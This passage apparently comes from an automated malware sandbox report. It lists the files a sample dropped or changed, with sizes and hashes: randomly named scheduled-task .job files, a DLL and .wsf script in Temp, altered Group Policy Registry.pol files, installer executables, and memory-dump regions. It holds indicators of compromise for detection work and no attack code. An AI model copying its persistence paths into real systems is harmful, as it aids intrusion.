SHA512442c721bd48788941606725eb226d29708a9455335aeba4e12569cab9075f590a5ee35c206d3a707bdb71c099e3dd59d1f78fa475258b3b615f97ccb09feaed0
-
C:\Windows\Tasks\GSDaywQPJdyrKXMOz.jobFilesize
424B
MD5e9fe1745d9363af6a99d5dbc9891b4cd
SHA1e7ca6367adb8550313e499eb2edb17d4ef303a7b
SHA256bdb0be31db68ee683ba64ffcae872cc9f21360c301c1e345c3f99f8e2759c2e4
SHA5126908319d54441e4fa2b900cc96876243880b49d0e9f878e1f95a8d232b69f60c429b1d05be4ade9f48ca547cdec41603e0b8c3637a5d14352b1662e180c0b275
-
C:\Windows\Tasks\erLaEdTsgGebTau.jobFilesize
290B
MD515d13399643b4f650694bcfaf9ddfb43
SHA1ee6e327e5330b86fe62082e3dcd716623203f556
SHA256311d99765636f30cd1480a8e58578629a3990986567cff83100287d22af166e4
SHA512393739bcfb1992cf75a35346fcd08fff47e3511e5624b51139d15bde702f9762c6bac849afd97f09607c222cc471802db5dc102539310b61f3ec0796c29b93f3
-
C:\Windows\Temp\gLbKcqvTyliDAKYm\hUBYIJKz\MNsUfTj.dllFilesize
6.5MB
MD5008d6162a1c3bee849545d99cdca4da7
SHA1198ef7457efe566d6632b8dd69e601a70b62e106
SHA256c83932d2ded84adb6da7d6b8c9683defa007adb9936a2425ee91b27d2594dc5b
SHA5126a5ccb8cc635a37ef0925bc23267c40166c6f64674fa64fdee2532ae79d94920661056f1a3aa7d06e4aece5674bba3c17d8e3d67bbd7fa121b56d1e800634907
-
C:\Windows\Temp\gLbKcqvTyliDAKYm\sqOGvVJo\RbrZgXRSszJxEWTc.wsfFilesize
9KB
MD59d3ada52097cef1f953a9cc7666ce3be
SHA1023c270aa253c710038af85b83d7efafc7c9e75d
SHA256a733e896bf41d0667ad2cf72cbbcd78ace0a95775ff7b8b51c3ca1e6319e4629
SHA512d91565e8f832d18e514c26071f5e31e61b5da1a5daf533d8511ef28d9c726dc6b26391338fc4d5cc9c4f233b338c98930015c76067af491d9a815e45c5ad2466
-
C:\Windows\system32\GroupPolicy\Machine\Registry.polFilesize
6KB
MD5133df1191532ced3972cc9d6f4bdbcf7
SHA1a0e94fb9b81b53a6bef5d5d388d7584989ca7b4f
SHA256bed151993cedd5f13fdd108050f88f185d97089b151d21edf57464f4687027c3
SHA5120d2379b1150efdfe9438b6ecd7a506b763a47e0a8abc9d5bc9ffafae3a1c443978e25084571bb16db8ccc3447e577b420471ba0eabf427d38147d49dab71ab0d
-
C:\Windows\system32\GroupPolicy\Machine\Registry.polFilesize
5KB
MD58ac9866435c61ae8c2529681fca01983
SHA16027b86bf8a5ac8e6dd0be9d27145c3f6bb268d9
SHA2562826205a5acf6c1c0a257e718a622dbd0c1a9a40f6fe657e92a29beafa9c8201
SHA512e995caf9d399111b084549f38eb36c8b8316f41ccdd1b778044fc11c6338318bd41c03927b975a48d72aed5e553faf17066a7c12df73a3fe49b1b56e16989c97
-
C:\Windows\system32\GroupPolicy\gpt.iniFilesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Users\Admin\AppData\Local\Temp\7zS1796.tmp\Install.exeFilesize
6.3MB
MD52e3d577c3e01d9f6ae47e2d345900306
SHA1b0dc802aaaf5fa438a67ec737330f91e37752e11
SHA25663e2f16a27ffbc868b363a1ef1bcd3525ea58927d86db2ec9025b84e78d02d0a
SHA5120885988d1deb26fe7462ddbde55854e39c324d44be04391b11db54497f08f24ccd7a6ced8c9eb042e849ba367a9e8f29513068fe2ce7388fef8b2a2dec86299a
-
\Users\Admin\AppData\Local\Temp\7zS196A.tmp\Install.exeFilesize
6.7MB
MD5b4ef95e882fde8174e2c403933235f37
SHA1f12c45141684417134f4f233bfb988653a78ed68
SHA256538e6f897d7e83021ee8271a1659cc2f0113fdcbd6597d59e36fe8ac7485c091
SHA512dfd270d9b2ac20a35c049352c2d1c40c99893b64a756c26ec5b7a09ed51786bb010a2d79d00383d34ddb341104c6fd6d59200d395fdfb7f140321823c9d78883
-
memory/832-47-0x0000000001D80000-0x0000000001D88000-memory.dmpFilesize
32KB
-
memory/832-46-0x000000001B760000-0x000000001BA42000-memory.dmpFilesize
2.9MB
-
memory/1028-368-0x0000000002050000-0x00000000020B6000-memory.dmpFilesize
408KB
-
memory/1028-308-0x0000000002140000-0x00000000021C5000-memory.dmpFilesize
532KB
-
memory/1028-525-0x0000000004350000-0x0000000004422000-memory.dmpFilesize
840KB
-
memory/1028-293-0x0000000010000000-0x000000001328F000-memory.dmpFilesize
50.6MB
-
memory/1028-516-0x00000000024E0000-0x0000000002564000-memory.dmpFilesize
528KB
-
memory/1432-131-0x0000000002950000-0x0000000002958000-memory.dmpFilesize
32KB
-
memory/1432-130-0x000000001B5F0000-0x000000001B8D2000-memory.dmpFilesize
2.9MB
-
memory/2080-24-0x0000000010000000-0x000000001328F000-memory.dmpFilesize
50.6MB
-
memory/2200-57-0x00000000023C0000-0x00000000023C8000-memory.dmpFilesize
32KB
-
memory/2200-56-0x000000001B5E0000-0x000000001B8C2000-memory.dmpFilesize
2.9MB
-
memory/2244-215-0x000000001B5F0000-0x000000001B8D2000-memory.dmpFilesize
2.9MB
-
memory/2364-365-0x0000000001370000-0x00000000045FF000-memory.dmpFilesize
50.6MB
-
memory/2440-37-0x0000000010000000-0x000000001328F000-memory.dmpFilesize
50.6MB
-
memory/2572-81-0x0000000010000000-0x000000001328F000-memory.dmpFilesize
50.6MB
-
memory/2904-346-0x0000000003B00000-0x0000000003BD2000-memory.dmpFilesize
840KB
-
memory/2904-95-0x00000000020F0000-0x0000000002175000-memory.dmpFilesize
532KB
-
memory/2904-332-0x0000000002AB0000-0x0000000002B34000-memory.dmpFilesize
528KB
-
memory/2904-135-0x00000000021E0000-0x0000000002246000-memory.dmpFilesize
408KB
-
memory/2904-77-0x0000000010000000-0x000000001328F000-memory.dmpFilesize
50.6MB